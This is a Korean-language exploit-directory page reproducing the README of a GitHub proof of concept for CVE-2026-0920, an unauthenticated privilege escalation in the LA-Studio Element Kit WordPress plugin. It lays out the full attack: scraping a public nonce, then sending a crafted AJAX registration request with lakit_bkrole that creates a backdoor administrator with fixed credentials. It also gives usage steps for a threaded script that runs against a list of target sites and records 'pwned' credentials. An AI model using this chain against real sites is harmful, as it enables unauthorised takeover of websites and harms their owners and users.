Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-0920- — Elementor용 LA-Studio Element Kit <= 1.5.6.3 - lakit_bkrole 매개변수를 통한 백도어 기반 관리자 사용자 생성으로 이어지는 인증되지 않은 권한 상승 | Kitploit
도구/GitHubGitHub/nxploited/cve-2026-0920-
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityLearning & Education
GitHubnxploited/cve-2026-0920-

CVE-2026-0920-

Elementor용 LA-Studio Element Kit <= 1.5.6.3 - lakit_bkrole 매개변수를 통한 백도어 기반 관리자 사용자 생성으로 이어지는 인증되지 않은 권한 상승

저장소 보기
2175개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-0920-

LA-Studio Element Kit for Elementor <= 1.5.6.3 - lakit_bkrole 매개변수를 통한 백도어 기반 인증되지 않은 권한 상승 및 관리자 사용자 생성

   _____   _____   ___ __ ___  __      __  ___ ___ __  
  / __\ \ / / __|_|_  )  \_  )/ / ___ /  \/ _ \_  )  \ 
 | (__ \ V /| _|___/ / () / // _ \___| () \_, // / () |
  \___| \_/ |___| /___\__/___\___/    \__/ /_//___\__/ 

Telegram CVE CVSS Python License


📡 이 익스플로잇은 여기서 가장 먼저 공개됩니다. @KNxploited를 Telegram에서 팔로우하세요 — 새로 공개된 CVE, 작동하는 PoC, 정밀한 보안 연구를 위한 엘리트 피드입니다. 끊임없이 업데이트됩니다. 앞서 나가는 사람들을 위해 제작되었습니다.


🧠 개요

CVE-2026-0920은 LA-Studio Element Kit for Elementor WordPress 플러그인에서 발견된 CVSS 9.8 Critical(치명적) 취약점입니다.

이 결함은 AJAX를 통해 인증되지 않은 사용자 등록을 처리하는 ajax_register_handle() 함수에 존재합니다. 이 함수는 lakit_bkrole 매개변수에 대해 어떠한 제한도 적용하지 않아 — 완전히 인증되지 않은 공격자가 등록 중에 administrator 역할을 스스로 할당할 수 있으며, 단 한 번의 요청으로 WordPress 관리자 계정 전체를 장악할 수 있습니다.

필드세부 정보
CVE IDCVE-2026-0920
플러그인LA-Studio Element Kit for Elementor
슬러그lakit / la-studio-element-kit-for-elementor
영향받는 버전1.5.6.3까지의 모든 버전
취약점 유형인증되지 않은 권한 상승 / 관리자 계정 생성
공격 벡터네트워크 — 인증 불필요
CVSS 3.1 점수9.8 CRITICAL
CVSS 벡터AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
영향WordPress 관리자 계정 전체 장악
연구자Nxploited

💀 취약점 심층 분석

근본 원인은 플러그인의 AJAX 등록 핸들러에 역할 권한 검사가 누락된 것입니다:

// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);

public function ajax_register_handle() {
    $actions = json_decode(stripslashes($_POST['actions']), true);

    foreach ($actions as $req) {
        if ($req['action'] === 'register') {
            $data = $req['data'];

            $user_data = [
                'user_login' => $data['username'],
                'user_pass'  => $data['password'],
                'user_email' => $data['email'],
                'role'       => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
            ];

            // No validation of $data['lakit_bkrole'] against allowed roles
            wp_insert_user($user_data); // Administrator created silently
        }
    }
}

왜 치명적인가:

  • wp_ajax_nopriv_* = 인증 없이 누구나 접근 가능
  • lakit_bkrole은 administrator를 포함한 모든 WordPress 역할 문자열을 허용합니다
  • 단 한 번의 POST 요청으로 완전한 권한을 가진 관리자 계정이 생성됩니다
  • 필요한 nonce는 사이트의 프런트엔드 HTML/JS에 공개적으로 노출됩니다
  • 기본적으로 속도 제한이 없고, CAPTCHA가 적용되지 않으며, 이메일 인증도 필요하지 않습니다

⚔️ 익스플로잇 체인

Step 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)

Search HTML/JS for:
  "ajaxNonce": "<value>"         ← Inline JSON config
  ajaxNonce: '<value>'           ← JS variable
  data-ajaxnonce="<value>"       ← HTML attribute

Nonce is publicly accessible — no login required.
  ↓
ajaxNonce extracted ✔️

──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php

  action  = lakit_ajax
  _nonce  = <extracted nonce>
  actions = {
    "req1": {
      "action": "register",
      "data": {
        "email":                  "[email protected]",
        "password":               "adminSA",
        "username":               "Nx_admin",
        "lakit_field_log":        "yes",   ← use supplied username
        "lakit_field_pwd":        "yes",   ← use supplied password
        "lakit_field_cpwd":       "no",    ← skip password confirm
        "lakit_bkrole":           "1",     ← trigger admin role injection
        "lakit_recaptcha_response": ""
      }
    }
  }
  ↓
Administrator account silently created ✔️

──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
  log = Nx_admin
  pwd = adminSA
  ↓
Session cookies obtained → GET /wp-admin/plugin-install.php
  ↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️

⚙️ 요구 사항

pip install requests colorama
의존성용도
requestsHTTP 요청, 세션 처리, 쿠키 관리
colorama모든 플랫폼에서 색상 터미널 출력
threading동시 다중 대상 처리
reHTML/JS에서 정규식 기반 nonce 추출

Python 3.10+ 권장 (str | None 유니언 타입 힌트 사용).


📂 파일 구조

CVE-2026-0920/
├── CVE-2026-0920.py          # Main exploit script
├── list.txt                  # Target URLs — one per line
├── success_results.txt       # Auto-generated: pwned targets + credentials

🚀 사용 방법

1단계 — 자격 증명 구성 (선택 사항)

CVE-2026-0920.py를 열고 상단의 상수를 편집하여 원하는 관리자 계정 정보를 설정하세요:

ADMIN_EMAIL    = "[email protected]"   # Email for the new admin account
ADMIN_PASSWORD = "adminSA"                 # Password for the new admin account
ADMIN_USERNAME = "Nx_admin"               # Username for the new admin account

2단계 — 대상 준비

list.txt에 줄마다 대상 URL 하나씩 작성하세요:

https://target1.com
https://target2.com
http://target3.com

스킴이 없는 URL에는 자동으로 https://가 붙습니다.


3단계 — 익스플로잇 실행

python CVE-2026-0920.py

다음과 같은 프롬프트가 표시됩니다:

Enter targets list filename (e.g. list.txt): list.txt
Enter number of threads (1-50):             20

4단계 — 실시간 출력 모니터링

이 스크립트는 실시간 색상 구분 터미널 출력을 생성합니다:

[14:22:01] [*] https://target.com - Starting target
[14:22:02] [+] https://target.com - kay: a4f9c2b1e3
[14:22:02] [*] https://target.com - AJAX HTTP status: 200
[14:22:03] [+] https://target.com - AJAX response indicates success
[14:22:04] [*] https://target.com - Full admin verification: OK

============================================================
[ SUCCESS BLOCK ]
Site        : https://target.com
Result      : SUCCESS
AJAX OK     : YES
FULL ADMIN  : YES (login + plugin install access)
============================================================
색상의미
🔵 Cyan [*]정보 — 진행 중인 단계
🟢 Green [+]긍정 신호 — 부분적 또는 완전한 성공
🟡 Yellow [!]경고 — 결과가 모호하여 검토 필요
🔴 Red [-]실패 — 대상이 악용 불가능하거나 오류 발생

5단계 — 결과 검토

성공한 익스플로잇은 success_results.txt에 기록됩니다:

도구 다운로드